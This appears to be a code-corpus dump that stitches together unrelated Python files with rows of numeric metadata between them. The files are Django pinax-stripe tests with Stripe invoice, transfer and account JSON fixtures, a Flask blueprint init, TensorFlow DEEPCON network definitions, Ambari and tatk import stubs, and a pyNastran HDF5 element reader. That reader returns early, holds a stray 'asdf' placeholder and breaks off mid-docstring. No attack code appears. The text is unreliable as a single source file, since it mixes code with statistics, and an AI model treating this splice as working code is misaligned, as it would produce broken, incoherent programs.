invoices.sync_invoice_from_stripe_data(self.invoice_data)
self.assertTrue(SyncInvoiceItemsMock.called)
self.assertEquals(Invoice.objects.filter(customer=self.customer).count(), 1)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.invoices.sync_invoice_items")
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_from_stripe_data_no_subscription(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncSubscriptionMock):
SyncSubscriptionMock.return_value = None
data = {
"id": "in_17B6e8I10iPhvocMGtYd4hDD",
"object": "invoice",
"amount_due": 1999,
"application_fee": None,
"attempt_count": 0,
"attempted": False,
"charge": None,
"closed": False,
"currency": "usd",
"customer": self.customer.stripe_id,
"date": 1448470892,
"description": None,
"discount": None,
"ending_balance": None,
"forgiven": False,
"lines": {
"data": [{
"id": "ii_2342342",
"object": "line_item",
"amount": 2000,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "line_item"
}],
"total_count": 1,
"object": "list",
"url": "/v1/invoices/in_17B6e8I10iPhvocMGtYd4hDD/lines"
},
"livemode": False,
"metadata": {
},
"next_payment_attempt": 1448474492,
"paid": False,
"period_end": 1448470739,
"period_start": 1448211539,
"receipt_number": None,
"starting_balance": 0,
"statement_descriptor": None,
"subscription": "",
"subtotal": 2000,
"tax": None,
"tax_percent": None,
"total": 2000,
"webhooks_delivered_at": None
}
invoices.sync_invoice_from_stripe_data(data)
self.assertTrue(SyncInvoiceItemsMock.called)
self.assertEquals(Invoice.objects.filter(customer=self.customer).count(), 1)
self.assertIsNone(Invoice.objects.filter(customer=self.customer)[0].subscription)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.invoices.sync_invoice_items")
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_from_stripe_data_updated(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncSubscriptionMock):
SyncSubscriptionMock.return_value = self.subscription
data = self.invoice_data
invoices.sync_invoice_from_stripe_data(data)
self.assertTrue(SyncInvoiceItemsMock.called)
self.assertEquals(Invoice.objects.filter(customer=self.customer).count(), 1)
data.update({"paid": True})
invoices.sync_invoice_from_stripe_data(data)
self.assertEquals(Invoice.objects.filter(customer=self.customer).count(), 1)
self.assertEquals(Invoice.objects.filter(customer=self.customer)[0].paid, True)
class TransfersTests(TestCase):
def setUp(self):
self.data = {
"id": "tr_17BE31I10iPhvocMDwiBi4Pk",
"object": "transfer",
"amount": 1100,
"amount_reversed": 0,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"created": 1448499343,
"currency": "usd",
"date": 1448499343,
"description": "Transfer to test@example.com",
"destination": "ba_17BE31I10iPhvocMOUp6E9If",
"failure_code": None,
"failure_message": None,
"livemode": False,
"metadata": {
},
"recipient": "rp_17BE31I10iPhvocM14ZKPFfR",
"reversals": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/transfers/tr_17BE31I10iPhvocMDwiBi4Pk/reversals"
},
"reversed": False,
"source_transaction": None,
"statement_descriptor": None,
"status": "in_transit",
"type": "bank_account"
}
self.event = Event.objects.create(
stripe_id="evt_001",
kind="transfer.paid",
webhook_message={"data": {"object": self.data}},
validated_message={"data": {"object": self.data}},
valid=True,
processed=False
)
def test_sync_transfer(self):
transfers.sync_transfer(self.data, self.event)
qs = Transfer.objects.filter(stripe_id=self.event.message["data"]["object"]["id"])
self.assertEquals(qs.count(), 1)
self.assertEquals(qs[0].event, self.event)
def test_sync_transfer_update(self):
transfers.sync_transfer(self.data, self.event)
qs = Transfer.objects.filter(stripe_id=self.event.message["data"]["object"]["id"])
self.assertEquals(qs.count(), 1)
self.assertEquals(qs[0].event, self.event)
self.event.validated_message["data"]["object"]["status"] = "paid"
transfers.sync_transfer(self.event.message["data"]["object"], self.event)
qs = Transfer.objects.filter(stripe_id=self.event.message["data"]["object"]["id"])
self.assertEquals(qs[0].status, "paid")
def test_transfer_during(self):
Transfer.objects.create(
stripe_id="tr_002",
event=Event.objects.create(kind="transfer.created", webhook_message={}),
amount=decimal.Decimal("100"),
status="pending",
date=timezone.now().replace(year=2015, month=1)
)
qs = transfers.during(2015, 1)
self.assertEquals(qs.count(), 1)
@patch("stripe.Transfer.retrieve")
def test_transfer_update_status(self, RetrieveMock):
RetrieveMock().status = "complete"
transfer = Transfer.objects.create(
stripe_id="tr_001",
event=Event.objects.create(kind="transfer.created", webhook_message={}),
amount=decimal.Decimal("100"),
status="pending",
date=timezone.now().replace(year=2015, month=1)
)
transfers.update_status(transfer)
self.assertEquals(transfer.status, "complete")
@patch("stripe.Transfer.create")
def test_transfer_create(self, CreateMock):
CreateMock.return_value = self.data
transfers.create(decimal.Decimal("100"), "usd", None, None)
self.assertTrue(CreateMock.called)
@patch("stripe.Transfer.create")
def test_transfer_create_with_transfer_group(self, CreateMock):
CreateMock.return_value = self.data
transfers.create(decimal.Decimal("100"), "usd", None, None, transfer_group="foo")
_, kwargs = CreateMock.call_args
self.assertEquals(kwargs["transfer_group"], "foo")
@patch("stripe.Transfer.create")
def test_transfer_create_with_stripe_account(self, CreateMock):
CreateMock.return_value = self.data
transfers.create(decimal.Decimal("100"), "usd", None, None, stripe_account="foo")
_, kwargs = CreateMock.call_args
self.assertEquals(kwargs["stripe_account"], "foo")
class AccountsSyncTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(AccountsSyncTestCase, cls).setUpClass()
cls.custom_account_data = json.loads(
"""{
"type":"custom",
"tos_acceptance":{
"date":1490903452,
"ip":"123.107.1.28",
"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
},
"business_logo":null,
"email":"operations@someurl.com",
"timezone":"Etc/UTC",
"statement_descriptor":"SOME COMP",
"default_currency":"cad",
"payout_schedule":{
"delay_days":3,
"interval":"manual"
},
"display_name":"Some Company",
"payout_statement_descriptor": "For reals",
"id":"acct_1A39IGDwqdd5icDO",
"payouts_enabled":true,
"external_accounts":{
"has_more":false,
"total_count":1,
"object":"list",
"data":[
{
"routing_number":"11000-000",
"bank_name":"SOME CREDIT UNION",
"account":"acct_1A39IGDwqdd5icDO",
"object":"bank_account",
"currency":"cad",
"country":"CA",
"account_holder_name":"Luke Burden",
"last4":"6789",
"status":"new",
"fingerprint":"bZJnuqqS4qIX0SX0",
"account_holder_type":"individual",
"default_for_currency":true,
"id":"ba_1A39IGDwqdd5icDOn9VrFXlQ",
"metadata":{}
}
],
"url":"/v1/accounts/acct_1A39IGDwqdd5icDO/external_accounts"
},
"support_email":"support@someurl.com",
"metadata":{
"user_id":"9428"
},
"support_phone":"7788188181",
"business_name":"Woop Woop",
"object":"account",
"charges_enabled":true,
"business_name":"Woop Woop",
"debit_negative_balances":false,
"country":"CA",
"decline_charge_on":{
"avs_failure":true,
"cvc_failure":true
},
"product_description":"Monkey Magic",
"legal_entity":{
"personal_id_number_provided":false,
"first_name":"Luke",
"last_name":"Baaard",
"dob":{
"month":2,
"day":3,
"year":1999
},
"personal_address":{
"city":null,
"country":"CA",
"line2":null,
"line1":null,
"state":null,
"postal_code":null
},
"business_tax_id_provided":false,
"verification":{
"status":"unverified",
"details_code":"failed_keyed_identity",
"document":null,
"details":"Provided identity information could not be verified"
},
"address":{
"city":"Vancouver",
"country":"CA",
"line2":null,
"line1":"14 Alberta St",
"state":"BC",
"postal_code":"V5Y4Z2"
},
"business_name":null,
"type":"individual"
},
"details_submitted":true,
"verification":{
"due_by":null,
"fields_needed":[
"legal_entity.personal_id_number"
],
"disabled_reason":null
}
}""")
cls.custom_account_data_no_dob_no_verification_no_tosacceptance = json.loads(
"""{
"type":"custom",
"tos_acceptance":{
"date":null,
"ip":"123.107.1.28",
"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
},
"business_logo":null,
"email":"operations@someurl.com",
"timezone":"Etc/UTC",
"statement_descriptor":"SOME COMP",
"default_currency":"cad",
"payout_schedule":{
"delay_days":3,
"interval":"manual"
},
"display_name":"Some Company",
"payout_statement_descriptor": "For reals",
"id":"acct_1A39IGDwqdd5icDO",
"payouts_enabled":true,
"external_accounts":{
"has_more":false,
"total_count":1,
"object":"list",
"data":[
{
"routing_number":"11000-000",
"bank_name":"SOME CREDIT UNION",
"account":"acct_1A39IGDwqdd5icDO",
"object":"other",
"currency":"cad",
"country":"CA",
"account_holder_name":"Luke Burden",
"last4":"6789",
"status":"new",
"fingerprint":"bZJnuqqS4qIX0SX0",
"account_holder_type":"individual",
"default_for_currency":true,
"id":"ba_1A39IGDwqdd5icDOn9VrFXlQ",
"metadata":{}
}
],
"url":"/v1/accounts/acct_1A39IGDwqdd5icDO/external_accounts"
},
"support_email":"support@someurl.com",
"metadata":{
"user_id":"9428"
},
"support_phone":"7788188181",
"business_name":"Woop Woop",
"object":"account",
"charges_enabled":true,
"business_name":"Woop Woop",
"debit_negative_balances":false,
"country":"CA",
"decline_charge_on":{
"avs_failure":true,
"cvc_failure":true
},
"product_description":"Monkey Magic",
"legal_entity":{
"dob": null,
"verification": null,
"personal_id_number_provided":false,
"first_name":"Luke",
"last_name":"Baaard",
"personal_address":{
"city":null,
"country":"CA",
"line2":null,
"line1":null,
"state":null,
"postal_code":null
},
"business_tax_id_provided":false,
"address":{
"city":"Vancouver",
"country":"CA",
"line2":null,
"line1":"14 Alberta St",
"state":"BC",
"postal_code":"V5Y4Z2"
},
"business_name":null,
"type":"individual"
},
"details_submitted":true,
"verification":{
"due_by":null,
"fields_needed":[
"legal_entity.personal_id_number"
],
"disabled_reason":null
}
}""")
cls.not_custom_account_data = json.loads(
"""{
"business_logo":null,
"business_name":"Woop Woop",
"business_url":"https://www.someurl.com",
"charges_enabled":true,
"country":"CA",
"default_currency":"cad",
"details_submitted":true,
"display_name":"Some Company",
"email":"operations@someurl.com",
"id":"acct_102t2K2m3chDH8uL",
"object":"account",
"payouts_enabled": true,
"statement_descriptor":"SOME COMP",
"support_address": {
"city": null,
"country": "DE",
"line1": null,
"line2": null,
"postal_code": null,
"state": null
},
"support_email":"support@someurl.com",
"support_phone":"7788188181",
"support_url":"https://support.someurl.com",
"timezone":"Etc/UTC",
"type":"standard"
}""")
def assert_common_attributes(self, account):
self.assertEqual(account.support_phone, "7788188181")
self.assertEqual(account.business_name, "Woop Woop")
self.assertEqual(account.country, "CA")
self.assertEqual(account.charges_enabled, True)
self.assertEqual(account.support_email, "support@someurl.com")
self.assertEqual(account.details_submitted, True)
self.assertEqual(account.email, "operations@someurl.com")
self.assertEqual(account.timezone, "Etc/UTC")
self.assertEqual(account.display_name, "Some Company")
self.assertEqual(account.statement_descriptor, "SOME COMP")
self.assertEqual(account.default_currency, "cad")
def assert_custom_attributes(self, account, dob=None, verification=None, acceptance_date=None, bank_accounts=0):
# extra top level attributes
self.assertEqual(account.debit_negative_balances, False)
self.assertEqual(account.product_description, "Monkey Magic")
self.assertEqual(account.metadata, {"user_id": "9428"})
self.assertEqual(account.payout_statement_descriptor, "For reals")
# legal entity
self.assertEqual(account.legal_entity_address_city, "Vancouver")
self.assertEqual(account.legal_entity_address_country, "CA")
self.assertEqual(account.legal_entity_address_line1, "14 Alberta St")
self.assertEqual(account.legal_entity_address_line2, None)
self.assertEqual(account.legal_entity_address_postal_code, "V5Y4Z2")
self.assertEqual(account.legal_entity_address_state, "BC")
self.assertEqual(account.legal_entity_dob, dob)
self.assertEqual(account.legal_entity_type, "individual")
self.assertEqual(account.legal_entity_first_name, "Luke")
self.assertEqual(account.legal_entity_last_name, "Baaard")
self.assertEqual(account.legal_entity_personal_id_number_provided, False)
# verification
if verification is not None:
self.assertEqual(
account.legal_entity_verification_details,
"Provided identity information could not be verified"
)
self.assertEqual(
account.legal_entity_verification_details_code, "failed_keyed_identity"
)
self.assertEqual(account.legal_entity_verification_document, None)
self.assertEqual(account.legal_entity_verification_status, "unverified")
self.assertEqual(
account.tos_acceptance_date,
acceptance_date
)
self.assertEqual(account.tos_acceptance_ip, "123.107.1.28")
self.assertEqual(
account.tos_acceptance_user_agent,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
)
# decline charge on certain conditions
self.assertEqual(account.decline_charge_on_avs_failure, True)
self.assertEqual(account.decline_charge_on_cvc_failure, True)
# Payout schedule
self.assertEqual(account.payout_schedule_interval, "manual")
self.assertEqual(account.payout_schedule_delay_days, 3)
self.assertEqual(account.payout_schedule_weekly_anchor, None)
self.assertEqual(account.payout_schedule_monthly_anchor, None)
# verification status, key to progressing account setup
self.assertEqual(account.verification_disabled_reason, None)
self.assertEqual(account.verification_due_by, None)
self.assertEqual(
account.verification_fields_needed,
[
"legal_entity.personal_id_number"
]
)
# external accounts should be sync'd - leave the detail check to
# its own test
self.assertEqual(
account.bank_accounts.all().count(), bank_accounts
)
def test_sync_custom_account(self):
User = get_user_model()
user = User.objects.create_user(
username="snuffle",
email="upagus@test"
)
account = accounts.sync_account_from_stripe_data(
self.custom_account_data, user=user
)
self.assertEqual(account.type, "custom")
self.assert_common_attributes(account)
self.assert_custom_attributes(
account,
dob=datetime.date(1999, 2, 3),
verification="full",
acceptance_date=datetime.datetime(2017, 3, 30, 19, 50, 52),
bank_accounts=1
)
@patch("pinax.stripe.actions.externalaccounts.sync_bank_account_from_stripe_data")
def test_sync_custom_account_no_dob_no_verification(self, SyncMock):
User = get_user_model()
user = User.objects.create_user(
username="snuffle",
email="upagus@test"
)
account = accounts.sync_account_from_stripe_data(
self.custom_account_data_no_dob_no_verification_no_tosacceptance, user=user
)
self.assertEqual(account.type, "custom")
self.assert_common_attributes(account)
self.assert_custom_attributes(account)
self.assertFalse(SyncMock.called)
def test_sync_not_custom_account(self):
account = accounts.sync_account_from_stripe_data(
self.not_custom_account_data
)
self.assertNotEqual(account.type, "custom")
self.assert_common_attributes(account)
def test_deauthorize_account(self):
account = accounts.sync_account_from_stripe_data(
self.not_custom_account_data
)
accounts.deauthorize(account)
self.assertFalse(account.authorized)
class BankAccountsSyncTestCase(TestCase):
def setUp(self):
self.data = json.loads(
"""{
"id": "ba_19VZfo2m3chDH8uLo0r6WCia",
"object": "bank_account",
"account": "acct_102t2K2m3chDH8uL",
"account_holder_name": "Jane Austen",
"account_holder_type": "individual",
"bank_name": "STRIPE TEST BANK",
"country": "US",
"currency": "cad",
"default_for_currency": false,
"fingerprint": "ObHHcvjOGrhaeWhC",
"last4": "6789",
"metadata": {
},
"routing_number": "110000000",
"status": "new"
}
""")
def test_sync(self):
User = get_user_model()
user = User.objects.create_user(
username="snuffle",
email="upagus@test"
)
account = Account.objects.create(
stripe_id="acct_102t2K2m3chDH8uL",
type="custom",
user=user
)
bankaccount = externalaccounts.sync_bank_account_from_stripe_data(
self.data
)
self.assertEqual(bankaccount.account_holder_name, "Jane Austen")
self.assertEqual(bankaccount.account, account)
@patch("pinax.stripe.actions.externalaccounts.sync_bank_account_from_stripe_data")
def test_create_bank_account(self, SyncMock):
account = Mock()
externalaccounts.create_bank_account(account, 123455, "US", "usd")
self.assertTrue(account.external_accounts.create.called)
self.assertTrue(SyncMock.called)
| 39.044269
| 185
| 0.590457
| 12,767
| 133,180
| 5.942743
| 0.055769
| 0.020034
| 0.020113
| 0.025767
| 0.842562
| 0.804919
| 0.769938
| 0.736184
| 0.715438
| 0.678981
| 0
| 0.027511
| 0.290104
| 133,180
| 3,410
| 186
| 39.055718
| 0.774983
| 0.005451
| 0
| 0.676591
| 0
| 0.000342
| 0.197618
| 0.067904
| 0
| 0
| 0
| 0
| 0.147159
| 1
| 0.056468
| false
| 0.001711
| 0.004449
| 0
| 0.066051
| 0.002396
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
60283d3767102a62fff5c05524f74d2b51bcb845
| 165
|
py
|
Python
|
app/student/__init__.py
|
mecforlove/oj-web
|
3bec42e77666c6ab1d299d8c432016f7f1cd1cac
|
[
"Apache-2.0"
] | null | null | null |
app/student/__init__.py
|
mecforlove/oj-web
|
3bec42e77666c6ab1d299d8c432016f7f1cd1cac
|
[
"Apache-2.0"
] | null | null | null |
app/student/__init__.py
|
mecforlove/oj-web
|
3bec42e77666c6ab1d299d8c432016f7f1cd1cac
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: mec
from flask import Blueprint
students = Blueprint('students', __name__)
from views import show_problems
| 20.625
| 42
| 0.721212
| 22
| 165
| 5.181818
| 0.818182
| 0.298246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007042
| 0.139394
| 165
| 8
| 43
| 20.625
| 0.795775
| 0.333333
| 0
| 0
| 0
| 0
| 0.074074
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
607e2706ebd32ef255f891f787a3cef320319e20
| 5,073
|
py
|
Python
|
models.py
|
ba-lab/PDNET
|
d1547a334ee6e48526afcb4e0a4f698a04888ac5
|
[
"Apache-2.0"
] | 28
|
2020-04-29T07:33:06.000Z
|
2021-09-22T05:39:06.000Z
|
models.py
|
ba-lab/PDNET
|
d1547a334ee6e48526afcb4e0a4f698a04888ac5
|
[
"Apache-2.0"
] | 1
|
2021-11-12T15:12:38.000Z
|
2021-11-12T19:38:00.000Z
|
models.py
|
ba-lab/PDNET
|
d1547a334ee6e48526afcb4e0a4f698a04888ac5
|
[
"Apache-2.0"
] | 13
|
2020-05-03T04:38:35.000Z
|
2021-09-22T05:39:09.000Z
|
'''
Author: Badri Adhikari, University of Missouri-St. Louis, 12-18-2019
File: Contains tensorflow models for the DEEPCON architecture
'''
import tensorflow as tf
from tensorflow.python.keras import layers
from tensorflow.python.keras.layers import Input, Convolution2D, Activation, add, Dropout, BatchNormalization
from tensorflow.python.keras.models import Model
# A basic fully convolutional network
def basic_fcn(L, num_blocks, width, expected_n_channels):
input_shape = (L, L, expected_n_channels)
img_input = layers.Input(shape = input_shape)
x = img_input
for i in range(num_blocks):
x = layers.Conv2D(width, (3, 3), padding = 'same')(x)
x = layers.BatchNormalization()(x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(1, (3, 3), padding = 'same', kernel_initializer = 'one')(x)
x = layers.Activation('relu')(x)
inputs = img_input
model = tf.keras.models.Model(inputs, x, name = 'fcn')
return model
# Architecture DEEPCON (original)
def deepcon_rdd(L, num_blocks, width, expected_n_channels):
print('')
print('Model params:')
print('L', L)
print('num_blocks', num_blocks)
print('width', width)
print('expected_n_channels', expected_n_channels)
print('')
dropout_value = 0.3
my_input = Input(shape = (L, L, expected_n_channels))
tower = BatchNormalization()(my_input)
tower = Activation('relu')(tower)
tower = Convolution2D(width, 1, padding = 'same')(tower)
n_channels = width
d_rate = 1
for i in range(num_blocks):
block = BatchNormalization()(tower)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), padding = 'same')(block)
block = Dropout(dropout_value)(block)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), dilation_rate=(d_rate, d_rate), padding = 'same')(block)
tower = add([block, tower])
if d_rate == 1:
d_rate = 2
elif d_rate == 2:
d_rate = 4
else:
d_rate = 1
tower = BatchNormalization()(tower)
tower = Activation('relu')(tower)
tower = Convolution2D(1, 3, padding = 'same')(tower)
tower = Activation('sigmoid')(tower)
model = Model(my_input, tower)
return model
# Architecture DEEPCON (distances)
def deepcon_rdd_distances(L, num_blocks, width, expected_n_channels):
print('')
print('Model params:')
print('L', L)
print('num_blocks', num_blocks)
print('width', width)
print('expected_n_channels', expected_n_channels)
print('')
dropout_value = 0.3
my_input = Input(shape = (L, L, expected_n_channels))
tower = BatchNormalization()(my_input)
tower = Activation('relu')(tower)
tower = Convolution2D(width, 1, padding = 'same')(tower)
n_channels = width
d_rate = 1
for i in range(num_blocks):
block = BatchNormalization()(tower)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), padding = 'same')(block)
block = Dropout(dropout_value)(block)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), dilation_rate=(d_rate, d_rate), padding = 'same')(block)
tower = add([block, tower])
if d_rate == 1:
d_rate = 2
elif d_rate == 2:
d_rate = 4
else:
d_rate = 1
tower = BatchNormalization()(tower)
tower = Activation('relu')(tower)
tower = Convolution2D(1, 3, padding = 'same')(tower)
tower = Activation('relu')(tower)
model = Model(my_input, tower)
return model
# Architecture DEEPCON (binned)
def deepcon_rdd_binned(L, num_blocks, width, bins, expected_n_channels):
print('')
print('Model params:')
print('L', L)
print('num_blocks', num_blocks)
print('width', width)
print('expected_n_channels', expected_n_channels)
print('')
dropout_value = 0.3
my_input = Input(shape = (L, L, expected_n_channels))
tower = BatchNormalization()(my_input)
tower = Activation('relu')(tower)
tower = Convolution2D(width, 1, padding = 'same')(tower)
n_channels = width
d_rate = 1
for i in range(num_blocks):
block = BatchNormalization()(tower)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), padding = 'same')(block)
block = Dropout(dropout_value)(block)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), dilation_rate=(d_rate, d_rate), padding = 'same')(block)
tower = add([block, tower])
if d_rate == 1:
d_rate = 2
elif d_rate == 2:
d_rate = 4
else:
d_rate = 1
tower = BatchNormalization()(tower)
tower = Activation('relu')(tower)
tower = Convolution2D(bins, 3, padding = 'same')(tower)
tower = Activation('softmax')(tower)
model = Model(my_input, tower)
return model
| 37.029197
| 120
| 0.637295
| 639
| 5,073
| 4.885759
| 0.137715
| 0.038437
| 0.076233
| 0.053812
| 0.78123
| 0.779949
| 0.748559
| 0.72902
| 0.716848
| 0.716848
| 0
| 0.018447
| 0.230633
| 5,073
| 136
| 121
| 37.301471
| 0.78145
| 0.051646
| 0
| 0.844262
| 0
| 0
| 0.058333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032787
| false
| 0
| 0.032787
| 0
| 0.098361
| 0.172131
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
60a49a821b3996bd2766bbfd3fde0aedabadfafc
| 233
|
py
|
Python
|
stacks/XIAOMATECH/1.0/services/OZONE/package/scripts/scm.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 3
|
2019-08-13T01:44:16.000Z
|
2019-12-10T04:05:56.000Z
|
stacks/XIAOMATECH/1.0/services/OZONE/package/scripts/scm.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | null | null | null |
stacks/XIAOMATECH/1.0/services/OZONE/package/scripts/scm.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 7
|
2019-05-29T17:35:25.000Z
|
2021-12-04T07:55:10.000Z
|
from resource_management.libraries.script.script import Script
from resource_management.core.resources.system import Execute
from resource_management.libraries.functions.check_process_status import check_process_status
import utils
| 38.833333
| 93
| 0.896996
| 30
| 233
| 6.733333
| 0.5
| 0.178218
| 0.326733
| 0.306931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064378
| 233
| 5
| 94
| 46.6
| 0.926606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
60df1c4d9d45d7277cf5e5e1489ef91f6bfda9ad
| 29
|
py
|
Python
|
tatk/dst/__init__.py
|
libing125/tatk
|
1473a162cf45a4a40a60473169bc034234412b2e
|
[
"Apache-2.0"
] | 81
|
2019-03-12T13:40:29.000Z
|
2022-01-17T10:59:21.000Z
|
tatk/dst/__init__.py
|
zqwerty/tatk
|
fafabc45d02ad889f59354acac4e3b1367e7d4bf
|
[
"Apache-2.0"
] | 35
|
2019-03-13T14:05:05.000Z
|
2021-08-25T15:38:14.000Z
|
tatk/dst/__init__.py
|
zqwerty/tatk
|
fafabc45d02ad889f59354acac4e3b1367e7d4bf
|
[
"Apache-2.0"
] | 41
|
2019-03-13T09:40:24.000Z
|
2022-03-07T17:59:07.000Z
|
from tatk.dst.dst import DST
| 14.5
| 28
| 0.793103
| 6
| 29
| 3.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
714ba8119e1c6114588f3d07f3a79c67ae838357
| 6,906
|
py
|
Python
|
pyNastran/dev/h5/geometry/h5_elements_2d.py
|
luzpaz/pyNastran
|
939e9eefdc87a3bf67939a23dc09f155b93969a0
|
[
"BSD-3-Clause"
] | 293
|
2015-03-22T20:22:01.000Z
|
2022-03-14T20:28:24.000Z
|
pyNastran/dev/h5/geometry/h5_elements_2d.py
|
luzpaz/pyNastran
|
939e9eefdc87a3bf67939a23dc09f155b93969a0
|
[
"BSD-3-Clause"
] | 512
|
2015-03-14T18:39:27.000Z
|
2022-03-31T16:15:43.000Z
|
pyNastran/dev/h5/geometry/h5_elements_2d.py
|
luzpaz/pyNastran
|
939e9eefdc87a3bf67939a23dc09f155b93969a0
|
[
"BSD-3-Clause"
] | 136
|
2015-03-19T03:26:06.000Z
|
2022-03-25T22:14:54.000Z
|
from __future__ import annotations
from typing import TYPE_CHECKING
#import numpy as np
import h5py
from ..h5_utils import read_basic_element, h5py_to_dataframe
if TYPE_CHECKING: # pragma: no cover
from pyNastran.bdf.bdf import BDF
def read_cshear(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
#('EID', 'PID', 'G', 'DOMAIN_ID')
read_basic_element(group, geom_model, geom_model.add_cshear)
#EID = group['EID']
#PID = group['PID']
#NIDS = group['G']
#DOMAIN_ID = group['DOMAIN_ID']
#for eid, pid, nids in zip(EID, PID, NIDS):
#obj = geom_model.add_cshear(eid, pid, nids, comment='')
#obj.validate()
def read_ctria3(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
geom_model.card_count[name] = len(group['EID'])
setattr(geom_model, name, group)
return
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_ctria3(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, comment='')
obj.validate()
def read_cquad4(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
"""
Dataset:
attrs : <Attributes of HDF5 object at 1739457403880>
chunks : (270,)
compression : 'gzip'
compression_opts : 1
dims : <Dimensions of HDF5 object at 1739457403880>
dtype : dtype([('EID', '<i8'), ('PID', '<i8'), ('G', '<i8', (4,)), ('THETA', '<f8'), ('ZOFFS', '<f8'), ('TFLAG', '<i8'), ('T', '<f8', (4,)), ('MCID', '<i8'), ('DOMAIN_ID', '<i8')])
external : None
file : <HDF5 file "6+element-nastran-sol103.h5" (mode r)>
fillvalue : (0, 0, [0, 0, 0, 0], 0., 0., 0, [0., 0., 0., 0.], 0, 0)
fletcher32 : False
id : <h5py.h5d.DatasetID object at 0x00000194FFBD9BE8>
is_virtual : False
maxshape : (None,)
name : '/NASTRAN/INPUT/ELEMENT/CQUAD4'
